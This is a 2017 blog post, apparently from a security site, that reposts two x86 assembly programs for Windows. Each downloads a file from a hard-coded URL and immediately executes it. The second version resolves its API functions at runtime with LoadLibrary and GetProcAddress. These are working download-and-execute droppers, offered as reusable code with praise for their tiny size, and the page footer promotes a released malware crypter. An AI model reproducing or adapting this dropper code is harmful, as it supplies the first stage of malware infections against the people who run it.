Thursday, May 25, 2017
Home / Programming / Open Source / ASM – Downloader

ASM – Downloader

I found this nice piece of code on this website: http://wiremask.eu.  Why is ASM so good?  Well first of all it compiles into the smallest binary’s you have ever seen.

“A new development tutorial has been added. It explains how to code a file downloader + executer in assembly language using FASM compiler.

Link to full tutorial : http://wiremask.eu/page.php?id=2

The first code is the msot simple and clear dile downloader, it shows how to use windows API, the compiled file size is 2KB.”

downexec.asm

format PE GUI 4.0
; ASM Downloader Tutorial
; Simple Version
; Download and Execute a File
; 2012 By Wiremask.eu
 ; choose Entry point
entry start
include 'includewin32a.inc'
; Declare Constants
section '.data' data readable writeable
_file db 'file.htm',0
_url db 'http://wiremask.eu/',0
 section '.code' code readable executable
; Entry point
start:
; Call download of _url
invoke URLDownloadToFile, 0, _url, _file, 0, 0
; Call execution of _file
invoke ShellExecute, 0, 0, _file, 0, 0, SW_SHOW
; Exit Application
invoke ExitProcess, 0
 ; Declare API
section '.idata' import data readable
library kernel32,'kernel32.dll',
urlmon,'urlmon.dll',
shell32,'shell32.dll'
import kernel32,
ExitProcess,'ExitProcess'
import urlmon,
URLDownloadToFile,'URLDownloadToFileA'
import shell32,
ShellExecute,'ShellExecuteA'

This next code is a bit more complicated, it load API dynamically at runtime using GetProcAddress and LoadLibrary.

dyndownexec.asm

format PE GUI 4.0
; ASM Downloader Tutorial
; Advanced Version ( Dynamic )
; Download and Execute a File
; 2012 By Wiremask.eu
 ; choose Entry point
entry start
include 'includewin32a.inc'
; Declare Constants
section '.data' data readable writeable
_urlmon db 'urlmon.dll',0
_shell db 'shell32.dll',0
_URLDownloadToFile db 'URLDownloadToFileA',0
_ShellExecute db 'ShellExecuteA',0;
 _url db 'http://wiremask.eu/',0
_file db 'file.htm',0
 section '.code' code readable executable
start:
; Load urlmon.dll
invoke LoadLibrary, _urlmon
cmp eax, 0
je exit
; Get adress of URLDownloadToFileA function
invoke GetProcAddress, eax, _URLDownloadToFile
cmp eax, 0
je exit
; Set parameters of URLDownloadToFileA
push eax
push 0
push 0
push _file
push _url
push 0
; Call URLDownloadToFileA
call eax
pop eax
; Free urlmon.dll
invoke FreeLibrary, eax
 ; Load shell32.dll
invoke LoadLibrary, _shell
cmp eax, 0
je exit
; Get adress of ShellExecute function
invoke GetProcAddress, eax, _ShellExecute
cmp eax, 0
je exit
; Set parameters of ShellExecute
push eax
push SW_SHOW
push 0
push 0
push _file
push 0
push 0
; Call ShellExecute
call eax
pop eax
; Free shell32.dll
invoke FreeLibrary, eax
 exit:
; Exit Application
invoke ExitProcess, 0
 ; Declare API
section '.idata' import data readable
library kernel32,'kernel32.dll'
 import kernel32, ExitProcess, 'ExitProcess',
LoadLibrary,'LoadLibraryA',
GetProcAddress, 'GetProcAddress',
FreeLibrary, 'FreeLibrary'

About FastFlux

Owner of ZeroSecurity, interested in programming, malware analysis and penetration testing. If you would like to write for the ZeroSecurity team, please use the contact form above.

Check Also

iCrypt v1.3 Source Released

ACiiiD from a popular malware programming forum, Opensc.ws, has released a crypter project that was started …